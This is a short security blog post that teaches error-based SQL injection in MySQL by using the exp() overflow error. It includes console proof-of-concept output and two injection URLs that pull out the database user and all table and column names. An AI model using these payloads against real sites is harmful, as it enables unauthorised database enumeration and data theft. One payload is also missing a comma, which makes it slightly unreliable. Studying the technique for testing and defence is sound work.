Error Based Sql Injection With Exponential Method

Error based sql injection with exponential method

Error Based Sql Injection With Exponential Method

Hello guys in previous post I covered basic normal error based sql injection but in this post I will cover error based sql injection with exponential method and mathematical operations.When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

POC 1:

mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the log functions of MySQL.If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to:error based sql injection exponential method

POC 2:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+

| 2.70805020110221 |

1 row in set (0.00 sec)

Exponentials are the opposite of logarithms. The exp function would do the exact opposite for us.

Injection :

  • Extracting database name
    http://127.0.0.1/?id=1' or exp(~(select*from(select user())x))-- -
  • Extracting Table name and column name in one shot.
http://127.0.0.1/?id=1' or exp(~(select * from(select group_concat('<li>',table_name,'::::'column_name) from information_schema.columns where table_schema=database())x))-- -

Yeah we done and injected using exponential method.

Thanks for reading guys keep learning 😉

 

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

1 thought on “Error Based Sql Injection With Exponential Method”

Leave a Reply